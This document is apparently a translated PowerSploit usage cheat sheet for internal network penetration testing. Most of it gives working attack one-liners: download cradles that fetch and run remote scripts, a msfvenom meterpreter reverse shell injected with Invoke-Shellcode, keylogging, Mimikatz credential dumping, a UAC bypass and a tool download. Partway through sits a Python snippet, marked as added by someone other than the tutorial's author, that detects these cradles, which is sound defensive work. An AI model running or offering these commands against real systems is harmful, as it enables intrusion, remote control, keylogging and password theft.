PowerSploit

Introduction

A go-to toolkit for internal network penetration testing.


Basic usage

  1. Load a module

    # Remote load
    IEX(new-object net.webclient).downloadstring("http://xxllxxxx")

    # Local load
    import-module xxllxxx
  2. Use a module
    e.g.:

    Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\SAM
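The loading pattern above (an IEX download cradle followed by a module function, often with -Exec bypass) is exactly what a defender would hunt for in PowerShell script block or process command-line logging. The following is an added detection example, not code from this page or from the PowerSploit project; the sample command lines, the 192.0.2.10 address and the watchlist of function names are constructed for the demonstration.

```python
import re

# Indicators taken from the download cradles and module names shown on this page.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\s*\(?\s*\(?\s*new-object\s+(?:system\.)?net\.webclient\)?"
    r"\s*\.\s*download(?:string|file)\s*\("
)
EXEC_BYPASS_RE = re.compile(r"(?i)-exec(?:utionpolicy)?\s+bypass")
URL_RE = re.compile(r"(?i)https?://[^\s'\")]+")
# Watchlist of PowerSploit functions that appear on this page (constructed, not exhaustive).
POWERSPLOIT_FUNCTIONS = (
    "Invoke-Mimikatz", "Invoke-Shellcode", "Invoke-DllInjection", "Invoke-NinjaCopy",
    "Get-Keystrokes", "Invoke-Portscan", "Get-NetUser", "Get-NetDomain", "Bypass-UAC",
)
CANONICAL = {name.lower(): name for name in POWERSPLOIT_FUNCTIONS}
FUNCTION_RE = re.compile(r"(?i)\b(" + "|".join(map(re.escape, POWERSPLOIT_FUNCTIONS)) + r")\b")


def triage(text):
    """Score one PowerShell command line or script block; returns the indicators found."""
    functions = sorted({CANONICAL[m.group(1).lower()] for m in FUNCTION_RE.finditer(text)})
    indicators = {
        "download_cradle": bool(CRADLE_RE.search(text)),   # IEX(New-Object Net.WebClient).DownloadString(...)
        "exec_bypass": bool(EXEC_BYPASS_RE.search(text)),  # -Exec bypass / -ExecutionPolicy bypass
        "functions": functions,                            # watchlisted module functions, canonical casing
        "urls": URL_RE.findall(text),                      # where the module was fetched from
    }
    hits = indicators["download_cradle"] + indicators["exec_bypass"] + bool(functions)
    indicators["verdict"] = "high" if hits >= 2 else "medium" if hits == 1 else "none"
    return indicators


def flag_suspicious(lines):
    """Return (index, indicators) for every line whose verdict is not 'none'."""
    results = [(i, triage(line)) for i, line in enumerate(lines)]
    return [(i, ind) for i, ind in results if ind["verdict"] != "none"]


# Constructed sample command lines (as a 4688 command line or 4104 script block would carry); not real telemetry.
SAMPLE_LINES = [
    "IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/PowerSploit/Recon/PowerView.ps1');Get-NetUser",
    'powershell.exe -Exec bypass "Import-module .\\PowerView.ps1;Get-NetDomain"',
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
]

if __name__ == "__main__":
    for index, ind in flag_suspicious(SAMPLE_LINES):
        print(index, ind["verdict"], ind["functions"], ind["urls"])
```

The cradle regex tolerates the spacing and casing variants used on this page (IEX vs Invoke-Expression, Net.WebClient vs System.Net.WebClient, DownloadString vs DownloadFile), so the same rule covers the one-liners in the later sections.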

Usage examples

Domain information gathering

# Load the PowerView module remotely and query net user
powershell.exe -Exec bypass "IEX(New-Object Net.WebClient).DownloadString('http://111.230.170.95/PowerSploit/Recon/PowerView.ps1');Get-NetUser"

# Load locally and use
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Invoke-U"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Invoke-P"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-IPAddress"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-NetDomain"
powershell.exe -exec bypass "Import-module .\PowerView.ps1;Get-NetUser"
powershell.exe -Exec bypass -Command "Import-module .\PowerView.ps1;Get-NetUser"

Reverse shell (meterpreter)

  1. Use msfvenom to generate a reverse-connection payload for Invoke-Shellcode to inject; place the generated payload on the web server as well

    msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.158.133 LPORT=4444 -f powershell -o /var/www/html/code
  2. In PowerShell, download and invoke Invoke-Shellcode and the generated payload via IEX

    IEX(New-Object Net.Webclient).DownloadString("http://192.168.158.133/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
  3. Set up a listener in Metasploit (Payload, LHOST, LPORT)

    use exploit/multi/handler
    set Payload windows/x64/meterpreter_reverse_https
    set LHOST 192.168.158.133
    set LPORT 4444
    exploit
  4. Inject the shellcode into the local PowerShell process
    Call Invoke-Shellcode from PowerShell
    Invoke-Shellcode -Shellcode $buf -Force
  5. Inject the shellcode into a specified process
    In PowerShell, look up the target process, e.g. notepad
    ps -Name notepad

Inject into the specified process

Invoke-Shellcode -Shellcode $buf -ProcessID 2286 -Force

The Invoke-DllInjection module can also be used to inject a DLL file into a process.


Port scanning

Use Invoke-Portscan to scan ports on internal hosts

C:\Windows\system32> IEX(New-Object net.webclient).DownloadString("http://192.168.158.133/PowerSploit/Recon/Invoke-Portscan.ps1")

Invoke-Portscan -Hosts 192.168.174.200 -Ports "20-25"
Invoke-Portscan -Hosts 192.168.174.200 -Ports "21,22,23,80,1433,3306,3389,8080"

One-liner port and host-liveness probe of a subnet

powershell.exe -Exec bypass "IEX(New-Object net.webclient).downloadstring('http://192.168.5.10/upload/xxllxx/PowerSploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 10.1.1.128/25 -Ports '20,21,22,23,25,53,80,123,134,135,161,162,8161,389,443,445,513,873,1433,1080,1521,1900,2049,2601,2082,3128,2604,2083,3312,3306,4899,4440,8834,4848,3312,3389,4440,5672,5900,6082,6379,7001,8000,8080,8089,8161,8649,9000,9090,9300,9999,10050,11211,28017,3777,27017,50000,50060,50070'"


Keylogging

Exfiltration module
Use Get-Keystrokes to record the user's keyboard input

IEX(New-Object net.webclient).DownloadString("http://192.168.158.133/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

Get-Keystrokes -LogPath C:\Users\xxllxx\Desktop\hack\Keystrokes.txt


Grabbing plaintext passwords from memory

Invoke-Mimikatz module
Download and invoke Invoke-Mimikatz via IEX

IEX(New-Object net.webclient).downloadstring("http://192.168.158.133/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

Invoke-Mimikatz -DumpCreds

One-liner version

powershell.exe -Exec bypass "IEX(New-Object net.webclient).downloadstring('http://192.168.5.10/upload/xxllxx/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"


User Account Control bypass

Bypass UAC
When UAC is at the default level or below:
Powershell suite

powershell.exe -exec bypass "import-module .\Bypass-UAC.ps1;Bypass-UAC"

# win 7 Pro
(figure: UacMethodSysprep)

# win 10 pro
(figure: UacMethodTcmsetup)

Remote file download with PowerShell

  • windows 7

    powershell.exe -Exec bypass "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.5.10/upload/xxllxx/LCX-master/Lcx.exe','.\lcx.exe')"
  • windows 8 and later

    powershell.exe "wget 'http://192.168.5.10/upload/xxllxx/LCX-master/Lcx.exe' -outfile '.\lcx.exe'"
